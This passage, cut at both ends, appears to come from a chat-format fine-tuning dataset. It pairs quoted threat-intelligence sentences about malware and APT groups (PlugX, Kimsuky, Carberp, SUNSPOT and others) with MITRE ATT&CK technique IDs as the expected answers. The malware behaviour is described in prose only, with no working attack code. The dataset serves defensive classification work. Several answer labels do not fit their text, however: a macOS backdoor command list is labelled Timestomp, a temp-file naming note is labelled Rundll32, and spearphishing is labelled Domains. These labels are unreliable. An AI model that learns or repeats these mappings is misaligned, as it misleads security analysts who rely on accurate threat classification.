- "content": "As shown in Figure 11, after compromising an initial victim's system (patient 0), the threat actors use the Baidu search engine to search for the victim's organization name"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GrimAgent can base64 encode C2 replies."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has run \"whoami\" on a victim."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The switch statement checks for 19 cases, between 101 and 119. (Updated to correct command IDs, thanks @mykill!) Command ID Function Description 101 getInfoOSX Gathers username and OSX version and responds using the encrypted form of the following string: “Mac OS X – [OSX version] x64
\\nUser name – [username]” 102 getProcessList Runs “ps aux” to obtain a list of running processes 103 remoteShell Runs supplied command using “/bin/sh” 104 getInstalledAPP Gets a list of installed applications by running the command “ls -la /Applications” 105 showBackupIosFolder Checks to see if an IOS device was backed up to the system by running the command “ls -la ~/Library/Application\\ Support/MobileSync/Backup/” 106 downloadFileFromPath Uploads a file from a specified path 107 createFileInSystem Downloads a file, specifically provided within the C2 server’s HTTP response 108 execFile Executes a specified file on the system using the NSTask:launch method 109 deletFileFromPath Deletes a specified file using the NSFileManager:removeFileAtPath method 110 takeScreenShot Takes a screenshot using the CGGetActiveDisplayList, CGDisplayCreateImage, NSImage:initWithCGImage methods"
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp', 'T1071 - Application Layer Protocol', 'T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to delete a file and deletes files after they have been successfully uploaded to C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum was seen using MimikatzLite to perform credential dumping."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This specific module appears to have been put together from public sources with some added functionality from the attackers. Perhaps the most interesting part here is the unusual command and control mechanism based on TCP/UDP packets, as well as the C&C hostname which fits previously known Turla activity"
- },
- {
- "role": "assistant",
- "content": "T1205 - Traffic Signaling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kevin can delete files created on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 used sticky-keys to obtain unauthenticated, privileged console access."
- },
- {
- "role": "assistant",
- "content": "T1546.008 - Event Triggered Execution: Accessibility Features"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shark can use DNS in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carberp's passw.plug plugin can gather passwords saved in Opera, Internet Explorer, Safari, Firefox, and Chrome."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "List of installed antivirus products - OS version - Username - Computer name - Whether any of the following software is installed: Diebold Warsaw GAS Tecnologia (an application to protect access to online banking) Trusteer Several Latin American banking applications - Diebold Warsaw GAS Tecnologia (an application to protect access to online banking) - Trusteer - Several Latin American banking applications"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While it includes multiple ways to find Explorer, the preferred method is to get the process id from the current desktop window."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "first attempts to use a Base64-encoded network protocol over a raw TCP socket for C2, and if that method fails, falls back to a secondary HTTP-based protocol to communicate to an alternate C2 server."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Newer HttpBrowser versions use SSL with self-signed certificates to encrypt network communications"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing', 'T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carberp has installed a bootkit on the system to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1542.003 - Bootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The PlugX malware can be configured to use HTTP, DNS, raw TCP, or UDP to avoid network-based detection. In one sample analyzed by CTU researchers, PlugX was configured with hard-coded user credentials to bypass a proxy that required authentication. Newer HttpBrowser versions use SSL with self-signed certificates to encrypt network communications"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols', 'T1071.004 - Application Layer Protocol: DNS', 'T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke can detect a running process's PID on the infected machine."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After this file is copied, the original ‘Update.~tmp’ file is deleted"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mimikatz The threat actors also uploaded tools to scan for and exploit potential vulnerabilities in the network, such as the well-known SMB vulnerability patched in commonly exploited by EternalBlue to move laterally to other systems on the network."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can target and steal locally stored emails to support thread hijacking phishing campaigns."
- },
- {
- "role": "assistant",
- "content": "T1114.001 - Email Collection: Local Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If installing itself as a service fails, instead writes itself as a file named svchost.exe saved in %APPDATA%\\Microsoft\\Network."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can communicate over HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ajax Security Team has lured victims into executing malicious files."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE can implement use of proxies to pivot traffic."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mosquito's launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) An application is bundled with virtualization software, a Linux image and additional files used to achieve persistence. 2) User downloads the application and follows attached instructions on how to install it. 3) LoudMiner is installed first, the actual VST software after. 4) LoudMiner hides itself and becomes persistent on reboot. 5) The Linux virtual machine is launched and the mining starts. 6) Scripts inside the virtual machine can contact the C&C server to update the miner (configuration and binaries"
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution', 'T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects a list of network shares with the command net share."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the event this privilege was obtained, the common startup folder is queried by reading the following registry key: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Common Startup Alternatively, if the privilege was unable to be obtained, Reaver.v2 will obtain the user’s startup folder by querying the following registry key: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup Reaver proceeds to write a shortcut file to ‘%TEMP%\\~WUpdate.lnk’"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 created user accounts and adds them to the User and Admin groups."
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POLONIUM has used valid compromised credentials to gain access to victim environments."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used various MS-SQL stored procedures."
- },
- {
- "role": "assistant",
- "content": "T1505.001 - SQL Stored Procedures"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turian can use VMProtect for obfuscation."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Following a series of denial-of-service attacks and website defacements, the new destructive malware corrupts the master boot record (MBR), partition and file system of all available physical drives on Windows machines"
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We are unsure of the shellcode hosted at this URL, but it is possible that additional shellcode-based payloads like Meterpreter could have been served by this shellcode"
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used Dropbear SSH with a hardcoded backdoor password to maintain persistence within the target network. Sandworm Team has also used VPN tunnels established in legitimate software company infrastructure to gain access to internal networks of that software company's users."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This example of BazarLoader generated command and control (C2) activity, retrieving BazarBackdoor using HTTPS traffic from 104.248.174[.]225 over TCP port 443."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On November 9, 2018, we observed a relatively small email campaign (thousands of messages) delivering a new malware family that we call “ServHelper” based on file names associated with infection. The campaign primarily targeted financial institutions and was attributed to the threat actor TA505. The messages (Figure 1) contained Microsoft Word or Publisher attachments with macros that, when enabled, downloaded and executed the malware. This campaign used the “tunnel” variant of ServHelper, described in the “Malware Analysis” section"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link', 'T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tonto Team has relied on user interaction to open their malicious RTF documents."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In these cases, the temporary file is written to the %TEMP% directory, and the filename is a combination of numbers generated from a call to GetTickCount and the '.dat' extension (e.g"
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BUBBLEWRAP collects system information, including the operating system version and hostname."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The APT group has used web hosting credentials—stolen from victims outside of their usual targets—to host their malicious scripts and tools. Kimsuky likely obtained the credentials from the victims via spearphishing and credential harvesting scripts. On the victim domains, they have created subdomains mimicking legitimate sites and services they are spoofing, such as Google or Yahoo mail. 14] - Kimsuky has also sent benign emails to targets, which were possibly intended to build trust in advance of a follow-on email with a malicious attachment or link. Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. The APT group invited the targets to a Skype interview on the topic of inter-Korean issues and denuclearization negotiations on the Korean Peninsula. Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. After a recipient agreed to an interview, Kimsuky sent a subsequent email with a malicious document, either as an attachment or as a Google Drive link within the body. The document usually contained a variant of BabyShark malware (see the Execution section for information on BabyShark). When the date of the interview drew near, Kimsuky sent an email canceling the interview. Kimsuky tailors its spearphishing and social engineering approaches to use topics relevant to the target, such as COVID-19, the North Korean nuclear program, or media interviews"
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNSPOT created a copy of the SolarWinds Orion software source file with a \".bk\" extension to backup the original content, wrote SUNBURST using the same filename but with a \".tmp\" extension, and then moved SUNBURST using \"MoveFileEx\" to the original filename with a \".cs\" extension so it could be compiled within Orion software."
- },
- {
- "role": "assistant",
- "content": "T1565.001 - Stored Data Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some SeaDuke samples have a module to use pass the ticket with Kerberos for authentication."
- },
- {
- "role": "assistant",
- "content": "T1550.003 - Use Alternate Authentication Material: Pass the Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors uploaded commonly available hacker tools to compromised web servers."
- },
- {
- "role": "assistant",
- "content": "T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Exaramel for Windows dropper creates and starts a Windows service named wsmprovav with the description “Windows Check AV.”"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a plugin to detect active drivers of some security products."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use tasklist to collect a list of running tasks."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "(Source: Dell SecureWorks) Table 4 lists the OwaAuth web shell commands available to the adversary"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "puts a space after a false .jpg extension so that execution actually goes through the Terminal.app program."
- },
- {
- "role": "assistant",
- "content": "T1036.006 - Masquerading: Space after Filename"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor's dispatcher can modify the Run registry key."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CallMe uses AES to encrypt C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FinFisher enumerates directories and scans for certain files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerSploit's \"Find-AVSignature\" AntivirusBypass module can be used to locate single byte anti-virus signatures."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Recursively generate a list of files in a directory and send to the control server - Terminate a specific process. The process is identified by the control server sending the PID to the malware"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery', 'T1543.003 - Create or Modify System Process: Windows Service', 'T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The “WmiApCom.bat” file is simply used to start “WmiApCom”, which happens to be the exact same file as the one dropped by the malicious Word documents. However, this is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Peppy can download and execute remote files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses Pastebin to store its real C2 addresses."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has avoided detection by naming a malicious binary explorer.exe."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ADVSTORESHELL can list connected devices."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bankshot recursively generates a list of files within a directory and sends them back to the control server."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has sent emails containing malicious attachments that require users to execute a file or macro to infect the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "watch/? search/? find/? results/? open/? search/? close/? The “ai” value stands for the payload title"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX has a module to enumerate drives and find files recursively."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Dust Storm, the threat actors relied on potential victims to open a malicious Microsoft Word document sent via email."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DustySky can detect connected USB devices."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Penquin can add the executable flag to a downloaded file."
- },
- {
- "role": "assistant",
- "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum mimics HTTP protocol for C2 communication, while hiding the actual messages in the Cookie and Set-Cookie headers of the HTTP requests."
- },
- {
- "role": "assistant",
- "content": "T1001.003 - Protocol or Service Impersonation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to discover processes running on a system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
